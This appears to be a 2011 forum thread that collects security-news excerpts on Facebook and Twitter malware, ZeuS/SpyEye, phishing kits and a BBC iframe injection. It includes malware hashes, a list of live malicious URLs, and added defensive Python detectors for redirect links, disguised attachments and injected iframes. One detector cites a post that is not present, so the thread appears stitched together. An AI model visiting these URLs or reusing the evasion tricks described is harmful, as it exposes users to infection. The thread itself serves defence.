January 13, 2011 - "... I had no idea that the Bill and Melinda Gates Foundation, which normally fights poverty around the world and promotes healthcare, even ran a lottery - let alone that I had entered... Counting isn't this emailer's strong point either. He's managed to attach a grand total of 69 files to this email telling me about my windfall. Eventually I found the right one, entitled LOTTERY BILL GATES FOUNDATION.docx..." [NOT]


2011-01-15, 13:50

New Koobface Campaign Spreading on Facebook
- http://community.websense.com/blogs/securitylabs/archive/2011/01/14/new-koobface-campaign-spreading-on-facebook.aspx
14 Jan 2011 - "Websense... has detected a new Koobface campaign spreading on Facebook. The campaign is spreading via direct messages sent from compromised accounts... One of the tactics employed by the Koobface gang is to attempt to obfuscate the malicious URL that is linked in each message... this is done by adding "hpPg" just before the valid URL link--an obvious attempt to avoid detection by security software and by the Facebook security team. The addition at the start of the URL makes it unclickable, but this is unlikely to stop determined users from copying and pasting the link directly into the browser. Another tactic is the use of open redirects on the facebook.com domain itself. This gives the URL a more credible look (social engineering), as well as helping it pass basic security checks. Usually, Facebook alerts users if they're about to browse to a link outside of its domains, but no alert is triggered in this case... the open redirect on facebook.com points to a bit.ly shortened link. The redirector at bit.ly points to a compromised Web site controlled by Koobface. The compromised site checks whether the request was referred from facebook.com. If it was, then it serves a dynamically generated script that further redirects to a malicious site. The malicious site requires "a missing Flash plug-in" in order to play a "video," a.k.a., a variant of the Koobface worm. At the time of writing, the variant had a 23% detection rate*..."
* http://www.virustotal.com/file-scan/report.html?id=33b11888e8733938bb9d55a79b87a54ade942f6ef6efd3775497923e2cf80ffe-1294946291
File name: setup6440.exe
Submission date: 2011-01-13 19:18:11 (UTC)
Current status: finished
Result: 10/42 (23.8%)
There is a more up-to-date report ...
- http://www.virustotal.com/file-scan/report.html?id=33b11888e8733938bb9d55a79b87a54ade942f6ef6efd3775497923e2cf80ffe-1295019657
File name: setup606699.exe
Submission date: 2011-01-14 15:40:57 (UTC)
Result: 16/43 (37.2%)
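The two evasion tricks Websense describes in the post above (a "hpPg" prefix glued to the real URL so it is unclickable, and an open redirect on facebook.com that hands the browser off to a bit.ly link) can both be picked out of message text before a user copies and pastes them. The Python below is an added example written for this thread, not Websense's or Facebook's code: the sample message is constructed, the facebook.com redirect path and parameter name in it are placeholders (the post does not name them), and the checker therefore treats any facebook.com query parameter that carries an absolute off-site URL as the open-redirect pattern.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Junk prefix fused onto the URL, as reported in the post ("hpPg" immediately before "http").
PREFIXED_URL_RE = re.compile(r"(?<!\w)hpPg(https?://\S+)")
# Any plain URL in the message body.
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def is_facebook_host(host: str) -> bool:
    """True for facebook.com and its subdomains."""
    host = host.lower()
    return host == "facebook.com" or host.endswith(".facebook.com")


def find_open_redirect(url: str) -> Optional[str]:
    """Return the off-site destination host if a facebook.com URL carries
    an absolute URL to another domain in any query parameter, else None.

    The post does not say which redirect endpoint or parameter Koobface used,
    so every parameter is inspected (assumption of this example).
    """
    parsed = urlparse(url)
    if not is_facebook_host(parsed.hostname or ""):
        return None
    for values in parse_qs(parsed.query).values():  # parse_qs already URL-decodes
        for value in values:
            if value.startswith(("http://", "https://")):
                dest = urlparse(value).hostname
                if dest and not is_facebook_host(dest):
                    return dest
    return None


def analyze_message(text: str) -> List[Tuple[str, str]]:
    """Scan a message for the two tricks; returns (finding, detail) pairs.

    Findings:
      ("prefixed-url", <url>)                 junk prefix glued to a URL
      ("facebook-open-redirect", <dest host>) facebook.com link that leaves facebook.com
    """
    findings: List[Tuple[str, str]] = []
    for m in PREFIXED_URL_RE.finditer(text):
        findings.append(("prefixed-url", m.group(1).rstrip(".,;)")))
    for url in URL_RE.findall(text):
        dest = find_open_redirect(url.rstrip(".,;)"))
        if dest:
            findings.append(("facebook-open-redirect", dest))
    return findings


# Constructed sample message; the redirect path and parameter are placeholders.
SAMPLE_MESSAGE = (
    "lol is this you? hpPghttp://www.facebook.com/example-redirect"
    "?next=http%3A%2F%2Fbit.ly%2Fabc123"
)

if __name__ == "__main__":
    for finding, detail in analyze_message(SAMPLE_MESSAGE):
        print(f"{finding}: {detail}")
```

A message that only links to facebook.com itself produces no findings; the off-site check fires only when the decoded parameter value points at another host, which is exactly the hop the post says lets the link pass Facebook's leaving-the-site warning.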


2011-01-17, 22:55

Rogue Facebook apps can now access your home address and mobile phone number
- http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/
January 16, 2011 - "... third party application developers are now able to access your home address and mobile phone number. Facebook has announced that developers of Facebook apps can now gather the personal contact information from their users... Facebook is already plagued by rogue applications that post spam links to users' walls, and point users to survey scams that earn them commission - and even sometimes trick users into handing over their cellphone numbers to sign them up for a premium rate service. Now, shady app developers will find it easier than ever before to gather even more personal information from users... The ability to access users' home addresses will also open up more opportunities for identity theft, combined with the other data that can already be extracted from Facebook users' profiles... advice to you is simple: Remove your home address and mobile phone number from your Facebook profile now. While you're at it, go through our step-by-step guide for how to make your Facebook profile more private*..."
* http://www.sophos.com/security/best-practice/facebook/account-settings.html

Zodiac sign survey SCAM...
- http://nakedsecurity.sophos.com/2011/01/16/zodiac-sign-survey-scam-spreading-virally-on-facebook/
January 16, 2011 - "A scam has spread far and wide across Facebook this weekend, posted on many users' Facebook pages claiming that they have discovered that their zodiac sign has changed. Messages include:
The Zodiac Signs changed in 2011.
I was a [ZODIAC SIGN] now I'm a [ZODIAC SIGN]
Find out your new zodiac sign @ [LINK]
... and
OMG They changed the Zodiac Signs !!
I'm now a [ZODIAC SIGN].. (was a [ZODIAC SIGN] before!)
To find yours, use [LINK]
If you make the mistake of clicking on the link shared from your friend's Facebook account, then you are taken to an interim page showing the signs of the zodiac floating in outer space... If you do give it permission then the application will be able to grab some of your personal data, as well as post messages to your wall in order to share them virally with your Facebook friends..."

- http://sunbeltblog.blogspot.com/2011/01/latest-fb-scam-see-your-total-profile.html
January 17, 2011


2011-01-18, 22:36

Facebook suspends personal data-sharing feature
- http://www.theregister.co.uk/2011/01/18/facebook_suspends_data_sharing_feature/
18 January 2011 - "Facebook has "temporarily disabled" a controversial feature that allowed developers to access the home address and mobile numbers of users. The social network suspended the feature, introduced on Friday, after only three days. The decision follows feedback from users that the sharing of data process wasn't clearly explained and criticism from security firms that the feature was ripe for abuse... Facebook seems to be rediscovering the lessons Microsoft learned when it introduced User Access Control permissions to allow apps to run in Vista... Facebook clearly shares at least some of these concerns or it wouldn't have decided to suspend the feature."


2011-01-19, 19:59

Fake Facebook mail = Bredolab malware SPAM...
- http://techblog.avira.com/2011/01/19/bredolab-malware-spammed-via-fake-facebook-mails/en/
January 19, 2011 - "Facebook is abused again to spread Malware via Email. The spam mails arrive with the subject “Facebook password has been changed. ID” and contain a ZIP archive as attachment... Inside the ZIP a file with the name “Facebook_Document.exe” is located which is trying to look harmless by using the icon of a Microsoft Word document... The victim will think that the document is the only thing which is opened, and that it shows the new Facebook password. But in the background a fake antivirus called “Microsoft Security Essentials” is downloaded and gets installed on the computer..."
(Screenshots available at the URL above.)
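Both the "Death by PowerPoint" post (Real kamasutra.pps.exe, the double-extension trick) and the Bredolab post above (Facebook_Document.exe inside a ZIP, wearing a Word icon) rely on the user judging a file by the name or icon rather than by what it really is. The Python below is an added example for this thread, not code from Sophos, Avira or the thread's poster: it flags attachment names that pair a document extension with an executable one, executables whose basename pretends to be a document, and, going one step further than the posts, ZIP members whose content starts with the PE "MZ" header even though the name claims a document. The extension lists and the sample ZIP are constructed for the example.

```python
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Extensions Windows runs on double-click (constructed list for this example).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jar", "msi"}
# Extensions users read as harmless documents or media.
DOCUMENT_EXTS = {"pps", "ppt", "pptx", "doc", "docx", "pdf", "xls", "xlsx",
                 "jpg", "jpeg", "png", "txt", "htm", "html"}
# Words in a basename that suggest "this is just a document".
DOCUMENT_WORDS = re.compile(r"(document|doc|photo|foto|image|invoice|scan|pdf|receipt)")


@dataclass
class Finding:
    name: str
    reason: str


def inspect_attachment_name(name: str) -> Optional[Finding]:
    """Return a Finding when the name is an executable, and say how it is disguised.

    'Real kamasutra.pps.exe' -> double extension (document ext, then executable ext)
    'Facebook_Document.exe'  -> executable with a document-like basename
    'setup.exe'              -> plain executable, reported but not disguised
    'quarterly.pptx'         -> None
    """
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
        return Finding(name, f"double extension: looks like .{parts[-2]} but runs as .{ext}")
    if DOCUMENT_WORDS.search(".".join(parts[:-1])):
        return Finding(name, f"executable .{ext} with document-like name")
    return Finding(name, f"executable attachment (.{ext})")


def looks_like_pe(data: bytes) -> bool:
    """Windows executables (PE files) start with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def inspect_zip(data: bytes) -> List[Finding]:
    """Inspect every member of a ZIP attachment by name, then by content."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            by_name = inspect_attachment_name(info.filename)
            if by_name:
                findings.append(by_name)
            elif looks_like_pe(zf.read(info.filename)):
                # Name says document, bytes say executable.
                findings.append(Finding(info.filename, "PE header in a non-executable file name"))
    return findings


def build_sample_zip() -> bytes:
    """Constructed ZIP standing in for the mail attachment; no real malware inside."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Facebook_Document.exe", b"MZ placeholder, not a real program")
        zf.writestr("notes.txt", b"plain text, harmless")
        zf.writestr("report.pdf", b"MZ placeholder disguised as a PDF")
    return buf.getvalue()


if __name__ == "__main__":
    for n in ["Real kamasutra.pps.exe", "Facebook_Document.exe", "setup.exe", "quarterly.pptx"]:
        print(n, "->", inspect_attachment_name(n))
    for f in inspect_zip(build_sample_zip()):
        print(f.name, "->", f.reason)
```

The name checks are cheap enough to run in a mail gateway on every attachment; the MZ check is the one that catches the case the icon trick is built on, where the name has been made to look entirely innocent.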


2011-01-21, 00:02

Twitter worm - out there...
- http://isc.sans.edu/diary.html?storyid=10297
Last Updated: 2011-01-20 16:41:39 UTC - "... new twitter worm out there. There are an increased number of messages... Those short URLs point to the servers providing the malware. The following are some of the malicious URLs I could gather (CAREFUL: THEY ARE STILL ACTIVE):
• http ://cainnoventa .it/m28sx.html
• http ://servizialcittadino .it/m28sx.html
• http ://aimos.fr/m28sx .html
• http ://lowcostcoiffure .fr/m28sx.html
• http ://s15248477.onlinehome-server .info/m28sx.html
• http ://www.waseetstore .com/m28sx.html
• http ://www.gemini .ee/m28sx.html
After clicking the URL, you are sent to a fakeAV web page..."
(Screenshots available at the ISC URL above.)

- http://www.pcworld.com/article/217308/twitter_targeted_with_fake_antivirus_software_scam.html
Jan 21, 2011 "... Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that 'we're working to remove the malware links and reset passwords on compromised accounts.' 'Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?' she wrote. 'That's malware. Don't install'..."

- http://nakedsecurity.sophos.com/2011/01/20/fake-anti-virus-attack-twitter-via-goo-gl-links/
January 20, 2011 - "... If you make the mistake of clicking on one of the malicious goo.gl links you are ultimately taken to a website which attempts to scare you into believing that you have a virus problem on your computer. You are then frightened into installing malicious code on your PC, and asked to pay money to disinfect your systems... Ukrainian URL hosting the malware... The natural suspicion would be that their usernames and passwords have been stolen. It certainly would be a sensible precaution for users who have found their Twitter accounts unexpectedly posting goo.gl links to change their passwords immediately..."


2011-01-21, 19:08

Fraud advisory - FBI/iC3: e-mails...
- http://www.ic3.gov/media/2011/110119.aspx
January 19, 2011 - "... cyber criminals engaging in ACH/wire transfer fraud have targeted businesses by responding via e-mail to employment opportunities posted online. Recently, more than $150,000 was stolen from a US business via unauthorized wire transfer as a result of an e-mail the business received that contained malware. The malware was embedded in an e-mail response to a job posting the business placed on an employment website and allowed the attacker to obtain the online banking credentials of the person who was authorized to conduct financial transactions within the company. The malicious actor changed the account settings to allow the sending of wire transfers, one to the Ukraine and two to domestic accounts. The malware was identified as a Bredolab variant, svrwsc.exe. This malware was connected to the ZeuS/Zbot Trojan, which is commonly used by cyber criminals to defraud US businesses. The FBI recommends that potential employers remain vigilant in opening the e-mails of prospective employees. Running a virus scan prior to opening any e-mail attachments may provide an added layer of security against this type of attack. The FBI also recommends that businesses use separate computer systems to conduct financial transactions..."

Zbot-Zeus variants attack online money transactions...
- http://www.theregister.co.uk/2011/01/21/zeus_payment_provider_diversification/
21 January 2011 - "... Trusteer has detected 26 different ZeuS configurations targeting online payment provider Money Bookers. Configuration files are a set of instructions on what sites to target for the theft of login credentials, manipulation of HTML pages as presented to users of infected machines and other details. Another 13 variants of ZeuS, the last released only on 16 January, attempt to steal login credentials of Web Money users. Nochex, another online payment provider that specialises in providing payment processing services to small businesses, is the target of 12 different ZeuS configurations. Prepaid card provider netSpend and e-gold, a service abused as a payment clearing house by cybercrooks in the past, are also under attack by ZeuS wielding miscreants... More details... here*."
* http://www.trusteer.com/blog/zeus-latest-evolution-malware-trends-targets-online-payment-providers
January 20, 2011


2011-01-25, 16:43

SpyEye/ZeuS toolkit code shows up ...
- http://www.theregister.co.uk/2011/01/25/spyeye_zeus_merger/
25 January 2011 - "... first sample of code from the merger of the ZeuS and SpyEye cybercrime Trojan toolkits*... ZeuS has long been the root cause of many instances of banking fraud, while SpyEye is a much newer and even more aggressive addition... The malware-building tool includes options to build-in web injects, screenshot captures as well as hooks for various optional add-ins. Core functionality also includes code designed to evade Trusteer Rapport transactions security software, a security application offered to customers of many banks as a defence against banking Trojans. The latter feature shows that, once again, cybercrooks are attempting to up their game in response to developments by security defenders. Plug-ins include the ability to present users of compromised machines with fake pages and improved attacks against Firefox users... The cybercrime toolkit also includes improved credit-card grabbing functionality... Misdirection and misinformation... among the main tools of the cybercrime trade."
* http://blog.trendmicro.com/spyeyezeus-toolkit-v1-3-05-beta/
Toolkit detail ...


2011-01-26, 13:30

- http://community.websense.com/blogs/securitylabs/archive/2011/01/25/rebirth-of-a-phish-kit.aspx
25 Jan 2011 - "... The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit readies 7 of the biggest banks of Australia, covering almost all accounts. This kit was hosted on compromised Web sites with deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed... Similar to earlier phishing toolkits, this attack utilizes PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to enable the failover of the attack - given the limited lifecycle of phishing sites, more users fall victim to them in the first 24 hours of the attack. The readiness of this phishing toolkit -exceeds- Rock Phish..."


Facebook Tunisia keystroke logger...
- http://www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/
25 January 2011 - "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government... The rogue JavaScript, which was individually customized to steal passwords for each site, worked when users tried to login without availing themselves of the secure sockets layer protection designed to prevent man-in-the-middle attacks. It was found injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, around the same time that protestors began demanding the ouster of Zine el-Abidine Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago..."

Facebook photos lead to malware...
- http://sunbeltblog.blogspot.com/2011/01/phony-facebook-photos-lead-to-malware.html
January 25, 2011 - "This latest Facebook scam seems to have been rattling around for a few weeks now, directing you to malware from hacked websites hosting the rogue files. There also appear to be various Facebook application pages offering up the same dubious content. Typically, the scam involves sending messages to Facebook users from compromised accounts... Not a lot of sophistication there, but it doesn’t really take much to get people clicking. Downloading the file and running it will result in you sending your friends more "Foto" related spam and the whole process begins again. Some users report the messages appearing on their walls, while others have screenshots of messages popping up in their chat applications..."

Facebook scam: Free cellphone recharge
- http://sunbeltblog.blogspot.com/2011/01/facebook-scam-free-cellphone-recharge.html
January 24, 2011


2011-01-26, 18:58

Carberp malware sniffs out A/V to maximize attack impact
- http://www.computerworld.com/s/article/9206140/Carberp_malware_sniffs_out_antivirus_use_to_maximize_attack_impact
January 24, 2011 - "... The authors of the new information-stealing trojan "Carberp" have added a feature that detects which antivirus program is running on victimized PCs, said Aviv Raff, the chief technology officer at Seculert, an Israeli security startup. Raff said the criminals added security software detection to make sure they're spending their money wisely... The test services Raff mentioned are similar to legitimate scanning services such as VirusTotal, which lets users upload suspicious files for scanning by scores of for-a-fee and free antivirus programs. Suspect samples that evade detection are shared with the anti-malware community for use in creating new signatures. But other, less scrupulous services have popped up to serve criminals. These services, which security blogger Brian Krebs reported on as early as December 2009*, do not alert security companies when a new piece of malware is detected. That makes them ideal for hackers to check whether code will be detected before they release it. Raff said hackers pay to run their malware through these gray-market services to check the detection status of their code before they release it... Raff expects that Carberp will follow in the footsteps of the SpyEye and Siberia attack kits, and like them, incorporate links to a scanning service. Last week, Raff published an analysis of Carberp** that described new features other than the antivirus polling, including encryption of all communication with the hacker command-and-control server..."
* http://krebsonsecurity.com/2009/12/virus-scanners-for-virus-authors/

** http://blog.seculert.com/2011/01/new-trend-in-malware-evolution.html


2011-01-27, 22:27

Facebook - NEW security: Secure Browsing (https)
- http://techblog.avira.com/2011/01/27/facebook-improves-security/en/
"Facebook starts to roll out a new security feature: Secure Browsing (https). It will be available in the options of “Account Security”, below the “Account Settings” page.
This means that all data sent from and to Facebook will be transferred encrypted over the Internet if possible. Attacks to steal identities (for example in WiFi networks with Firesheep) will be rendered impossible this way...
Currently the feature seems to struggle with some problems though... some online games in Facebook don’t work properly together with activated Secure Browsing. This should be solved very soon... this is a step in the right direction and every Facebook user should activate that option as soon as it is available..."
(See screenshots available at the URL above.)

- http://news.cnet.com/8301-27080_3-20029670-245.html
January 26, 2011

- http://www.theregister.co.uk/2011/01/26/facebook_https/
26 January 2011 - "... The move comes a day after pranksters hacked into the Facebook page of CEO Mark Zuckerberg..."

- http://community.websense.com/blogs/securitylabs/archive/2011/01/26/mark-zuckerberg-facebook-page-showing-rogue-comments.aspx
26 Jan 2011


2011-01-31, 15:17

The Tax Spam Cometh
- http://www.pcworld.com/businesscenter/article/218047/the_tax_spam_cometh.html
Jan 28, 2011 - "It is that time of the year again: time to wait anxiously for W2s and 1099s to arrive, then feverishly compile figures and look for deductions to try and get back as much of your money from the IRS - or Her Majesty's Revenue and Customs (HMRC) - as possible. Do you know what that means? That means it is also time for attackers to capitalize on tax season with malware and phishing scams... Phishing e-mails are circulating, claiming that a miscalculation has been detected and that the recipient is owed a larger refund. Fred Touchette of Appriver* explains the new tax season threat. "The scammers see this as an opportunity to possibly catch some people slipping even though this most recent scam is targeting people who are already expecting a refund. To obtain the increased refund, recipients are directed to open the e-mail file attachment titled "Tax.Refund.New.Message.Alert .HTML." The resulting Web page appears to be the actual HMRC site, but is actually generated locally. The form requests sensitive information such as credit card details and mother's maiden name in order to process the refund..."
* http://blogs.appriver.com/blog/digital-degenerate/tax-deadlines-create-spikes-in-scam-trend-lines


2011-02-02, 13:27

Waledac... [has stolen] almost 500,000 email passwords ...
- http://www.theregister.co.uk/2011/02/02/waledac_account_compromise/
2 February 2011 - "Researchers* have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty. Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 Pop3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line*. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages. What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that -redirect- users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac. The discovery comes a month after a new malware-seeded spam run was spotted. This had all the hallmarks of the storm botnet... “The Waledac botnet remains just a shadow of its former self for now, but that's likely to change given the number of compromised accounts that the Waledac crew possesses,” the Last Line researchers wrote. In addition to a generous helping of compromised credentials, Waledac also comes with a new command and control system that disseminates a list of router nodes to infected machines."
* http://blog.tllod.com/2011/02/01/calm-before-the-storm/
February 1, 2011
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20101230

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=229200280
Feb. 2, 2011

Time for password changes...
- https://www.microsoft.com/protect/fraud/passwords/checker.aspx


2011-02-04, 22:35

Exploit rate - 61 percent of new vulnerabilities...
- http://www.darkreading.com/taxonomy/index/printarticle/id/229201156
Feb 03, 2011 - "The number of exploited vulnerabilities jumped dramatically last month, with more than 60 percent of new vulnerabilities being exploited... Exploit activity is typically at a rate of 30 to 40 percent, according to Fortinet's newly released January 2011 Threat Landscape report*. Close to half of "critical" vulnerabilities were exploited by attackers..."
* http://blog.fortinet.com/january-2011-many-new-vulnerabilities-exploited-spam-takes-another-hit/


2011-02-06, 13:07

Nasdaq hacked ...
- http://online.wsj.com/article/SB10001424052748704843304576126370179332758.html?mod=WSJ_hp_LEFTTopStories#printMode
Feb. 5, 2011 - "Nasdaq acknowledged Saturday it has been the victim of hackers and said it has notified customers about the problem. The statement by Nasdaq OMX Inc. came on the heels of a report in Saturday's Wall Street Journal that said unidentified hackers had repeatedly breached the company's computer network in the past year. In a written statement, the company said during its normal security screening, it discovered "malware" files installed on a part of its network called Directors Desk, a service designed to allow company boards to communicate by securely storing and sharing documents..."

- http://online.wsj.com/article/SB10001424052748704709304576124502351634690.html#printMode
Feb. 5, 2011


2011-02-08, 17:18

PDF exploit disguised...
- http://labs.m86security.com/2011/02/pdf-exploit-disguised-as-a-xerox-scanned-document/
February 7, 2011 - "Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks, however, have imitated email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner... Variations of subject lines were used like
“Scan from XER0X”,
“Scan from XER0X ZIP Office”,
“Scan from XER0X Center Office” or
“Scan from XER0X Center Office”
... the attachment is actually not a Xerox WorkCentre Pro scanned document but instead a PDF exploit file that utilizes old Adobe Acrobat Reader vulnerabilities ..."
(Screenshots available at the URL above.)

More malicious email - Virus Outbreak In Progress
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
February 08, 2011


2011-02-11, 17:57

Malware endemic...
- http://www.theregister.co.uk/2011/02/11/malware_endemic_survey/
11 February 2011 - "... European Union statistics agency EUROSTAT found that one third of PC users (31 per cent) had the pox even though the vast majority (84 per cent) were running security software (anti-virus, anti-spam, firewall) on their PCs. Of the survey's respondents, 3 per cent reported financial loss as a result of pharming or phishing attacks, while a further 4 per cent reported privacy violations involving data sent online. Bulgaria (58 per cent) and Malta (50 per cent) top the list of most infected users. By comparison, Finland (20 per cent), Ireland (15 per cent) and Austria (14 per cent) did relatively well. Trojans (59.2 per cent) were the most common type of infection found on compromised PCs, followed by viruses (11.7 per cent). A separate study by antivirus firm Panda*, also published this week, tells a similar story. Half (50 per cent) of the computers scanned by Panda in January harboured malware...
* http://press.pandasecurity.com/news/in-january-50-percent-of-computers-worldwide-were-infected-with-some-type-of-computer-threat/

- http://www.theinquirer.net/inquirer/news/2025421/anti-virus-software-losing-battle-war
Feb 10 2011


2011-02-12, 13:44

SPAM - Imageshack Scam Alerts...
- http://krebsonsecurity.com/2011/02/imageshack-swaps-spam-pages-for-scam-alerts/
February 12, 2011 - "... Spammers have been promoting their rogue pharmacy sites via images uploaded to free image hosting service imageshack.com. In response, the company appears to have simply replaced those images with the following subtle warning:
- http://krebsonsecurity.com/wp-content/uploads/2011/02/imgshack.png ..."


2011-02-15, 01:31

Malware SPAM campaigns
- http://labs.m86security.com/2011/02/spammed-malware-ramps-up-again/
February 14, 2011 - "... over the last week, we have seen the return of two familiar-looking malware spam campaigns.
* Post Express: Package Available
* United Parcel Service: Notification
While these two campaigns have similar themes, the spam originates from different spambots and has quite different payloads. The Post Express variety originates from the Asprox spambot... The UPS themed spam originates from one of the Cutwail spambot variants... VirusTotal results for the sample* are not overly helpful, showing widely varying names, including banking trojan, zbot, Bredolab and Oficla. Interestingly, when we pulled out some of the strings from the malware sample, we saw that it did indeed have an interest in banking... another string we found in the malware body was "Program Files\Trusteer\Rapport\bin\RapportService.exe". Trusteer Rapport is anti-fraud software which the SpyEye banking trojan toolkit specifically has an evasion option for. Not being content with just banking data, the bot also proceeded to download a number of different files, including Waledac and Cutwail spambots, plus it also threw in this fake anti-virus software for good measure... two lessons from this brief analysis. First, similar looking campaigns are not necessarily the same. Second, installer bots such as these can lead to a swathe of different malware on the infected host."
(Screenshots available at the m86 URL above.)
* http://www.virustotal.com/file-scan/report.html?id=23f95b4de9dda8731e991c1a86e01f82058a6dd79f0af7ae87228ee8d320fea3-1297477589
File name: USPS_Document.exe
Submission date: 2011-02-12 02:26:29 (UTC)
Result: 32/43 (74.4%)
- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
February 14, 2011

- http://labs.m86security.com/2011/02/ups-spam-oh-wait-its-an-fdic-spam-campaign/
February 15, 2011 - "... the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the FDIC... the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com..."
(Screenshots available at the URL above.)
- http://www.virustotal.com/file-scan/report.html?id=f0ba88d8ca25ff3d2c9014e50b50936c1a3247409c702de7a2729a3d2dc81458-1297829427
File name: 7529534f159bb49113908071a3061aa4
Submission date: 2011-02-16 04:10:27 (UTC)
Result: 26/43 (60.5%)


2011-02-16, 04:47

BBC - injected w/malicious iFrame
- http://community.websense.com/blogs/securitylabs/archive/2011/02/15/bbc6-website-injected-with-malicious-code.aspx
15 Feb 2011 - "The BBC - 6 Music Web site has been injected with a malicious iframe, as have areas of the BBC 1Xtra radio station Web site. At the time of writing this blog, the sites are still linking to an injected iframe... The injected iframe occurs at the foot of the BBC 6 Music Web page, and loads code from a Web site in the .co.cc TLD. The iFrame injected into the Radio 1Xtra Web page leads to the same malicious site. If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable. The payload is delivered to the end user only once, with the initial visit being logged by the malware authors. The code that is delivered to end users utilizes exploits delivered by the Phoenix exploit kit:
- http://community.websense.com/blogs/securitylabs/pages/phoenix-exploit-s-kit.aspx
A malicious binary is ultimately delivered to the end user. The VirusTotal detection* of this file is currently around 20%..."
* http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
File name: 4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b[...].bin
Submission date: 2011-02-15 15:38:13 (UTC)
Result: 9/43 (20.9%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1298083200
File name: 3810631eeaea4950d0e1bd48ec89be12
Submission date: 2011-02-19 02:40:00 (UTC)
Result: 28/43 (65.1%)
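The Websense write-up above describes the injection pattern (an iframe at the foot of the page, pointing to a .co.cc host, that loads the exploit kit). As an added example that is not code from Websense or the BBC, here is a small scanner for that pattern: it lists every iframe on a fetched page, flags those whose src is off-site, those on a free subdomain service such as .co.cc (the suffix list is an assumption, extend it as needed), and those sized or styled to be invisible. The sample page and the bad-example.co.cc host are constructed.

```python
"""Flag injected <iframe>s in a fetched HTML page.

Added example; not code from the Websense post or the BBC. It scans a page
for iframes whose src points off-site, and marks the ones an injection
typically hides (1x1 or display:none) or that sit on a free subdomain
service such as .co.cc. The page below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: free/abused subdomain services worth flagging; extend to taste.
SUSPECT_SUFFIXES = (".co.cc", ".cz.cc")


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> on the page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dimension(value):
    """'1', '1px', ' 0 ' -> int; missing or non-numeric -> None."""
    digits = re.sub(r"[^0-9]", "", value or "")
    return int(digits) if digits else None


def _is_hidden(attrs):
    width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((width is not None and width <= 1) or (height is not None and height <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def find_injected_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that look injected.

    page_host is the host the page was fetched from; iframes pointing
    anywhere else are 'off-site'. Reasons: off-site, suspect-suffix, hidden.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != page_host and not host.endswith("." + page_host):
            reasons.append("off-site")
        if host.endswith(SUSPECT_SUFFIXES):
            reasons.append("suspect-suffix")
        if _is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed page: one legitimate same-site embed, one injected iframe at the foot.
SAMPLE_PAGE = """<html><body>
<iframe src="http://www.bbc.co.uk/emp/player" width="512" height="288"></iframe>
<p>programme listings</p>
</body>
<iframe src="http://bad-example.co.cc/in.php" width="1" height="1"
        style="visibility: hidden"></iframe>
</html>"""

if __name__ == "__main__":
    for src, reasons in find_injected_iframes(SAMPLE_PAGE, "www.bbc.co.uk"):
        print(src, ", ".join(reasons))
```

Run it against the HTML you fetched with a separate client (curl, not the browser you care about), since the post notes the kit serves its payload once per visitor and logs the visit; a match on "off-site" plus "hidden" is the combination worth escalating.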


2011-02-18, 00:45

